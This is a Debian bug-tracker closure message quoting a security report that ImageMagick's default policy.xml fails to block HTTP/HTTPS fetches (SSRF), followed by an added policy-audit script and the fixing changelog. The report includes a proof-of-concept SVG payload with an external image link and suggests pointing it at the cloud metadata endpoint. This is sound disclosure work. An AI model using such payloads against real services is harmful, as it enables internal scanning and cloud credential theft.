Your message dated Tue, 16 Jun 2026 22:34:11 +0000
with message-id <[email protected]>
and subject line Bug#1140176: fixed in imagemagick 8:7.1.2.25+dfsg1-2
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are no-ops (SSRF, CWE-918)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch

Dear Maintainer,

The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:

  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />

These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).

Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.

The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.

Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.

1. Minimal listener:

   python3 -c '
import http.server, socketserver
class H(http.server.BaseHTTPRequestHandler):
    def do_GET(s):
        print("SSRF:", s.path)
        s.send_response(200)
        s.end_headers()
        s.wfile.write(b"GIF89a;")  # reply with a GIF header; only the request matters
    def log_message(s, *a):
        pass  # keep the listener quiet apart from the SSRF: lines
socketserver.TCPServer(("127.0.0.1", 7777), H).serve_forever()
'

2. Confirm the restrictive policy is active (this is correctly blocked):

   echo x > /tmp/q.txt
   magick label:@/tmp/q.txt /tmp/q.png
   -> magick: attempt to perform an operation not allowed by the
      security policy `@/tmp/q.txt'

3. PoC 1 -- direct URL coder:

   magick http://127.0.0.1:7777/ssrf out.png
   -> listener logs: SSRF: /ssrf

4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):

   printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink" width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf" width="10"
height="10"/></svg>' > evil.svg
   magick evil.svg out.png
   -> listener logs: SSRF: /svg-ssrf

Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.

Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.

Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:

  <policy domain="coder" rights="none"
          pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />

(keeping the existing @* path rule). Verify with:

  magick http://127.0.0.1:1/x x.png

which must be rejected by policy, not merely fail to connect.

Bastien Roucariès has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.

Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.

Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
[email protected]

--- End Message ---
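As an added example (not the reporter's code and not part of the Debian package), a small audit that applies the glob-match lookup described in the report to a policy.xml and tells an operator whether remote fetches are actually denied. It assumes ImageMagick's pattern matcher behaves like Python's fnmatch plus `{a,b}` alternation, and that the delegate identifier and coder name are "http:decode" and "HTTP" as the report states.

```python
import fnmatch
import re
import xml.etree.ElementTree as ET

# Constructed sample: the Debian delegate rules from the report plus the @* path rule.
VULNERABLE_POLICY = """<policymap>
  <policy domain="path" rights="none" pattern="@*" />
  <policy domain="delegate" rights="none" pattern="URL" />
  <policy domain="delegate" rights="none" pattern="HTTPS" />
  <policy domain="delegate" rights="none" pattern="HTTP" />
</policymap>"""

# Constructed sample: the coder-domain form suggested in the report.
FIXED_POLICY = """<policymap>
  <policy domain="path" rights="none" pattern="@*" />
  <policy domain="coder" rights="none"
          pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
</policymap>"""


def expand_braces(pattern):
    """Expand {a,b,c} alternation into plain glob patterns.
    Assumption: ImageMagick's GlobExpression treats braces this way."""
    m = re.search(r"\{([^}]*)\}", pattern)
    if not m:
        return [pattern]
    return [expanded for alt in m.group(1).split(",")
            for expanded in expand_braces(pattern[:m.start()] + alt + pattern[m.end():])]


def is_denied(policy_xml, domain, name):
    """True if a rights="none" rule in `domain` glob-matches `name`;
    an unmatched rule is inapplicable and the default (allow) wins."""
    root = ET.fromstring(policy_xml)
    for rule in root.iter("policy"):
        if rule.get("domain") != domain or rule.get("rights") != "none":
            continue
        if any(fnmatch.fnmatchcase(name, p)
               for p in expand_braces(rule.get("pattern", ""))):
            return True
    return False


def remote_fetch_blocked(policy_xml, scheme="http"):
    """A remote fetch is blocked only if the delegate identifier
    ("http:decode") or the coder name ("HTTP") is denied."""
    return (is_denied(policy_xml, "delegate", f"{scheme}:decode")
            or is_denied(policy_xml, "coder", scheme.upper()))
```

Run `remote_fetch_blocked` over the installed /etc/ImageMagick-7/policy.xml to confirm the fix landed; the `magick http://127.0.0.1:1/x x.png` check above remains the authoritative test.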
--- Begin Message ---
Source: imagemagick
Source-Version: 8:7.1.2.25+dfsg1-2
Done: Bastien Roucariès <[email protected]>

We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bastien Roucariès <[email protected]> (supplier of updated imagemagick package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Tue, 16 Jun 2026 22:22:44 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.2.25+dfsg1-2
Distribution: unstable
Urgency: medium
Maintainer: ImageMagick Packaging Team <[email protected]>
Changed-By: Bastien Roucariès <[email protected]>
Closes: 1140176
Changes:
 imagemagick (8:7.1.2.25+dfsg1-2) unstable; urgency=medium
 .
   * Fix default ImageMagick policy configuration (Closes: #1140176)



--- End Message ---
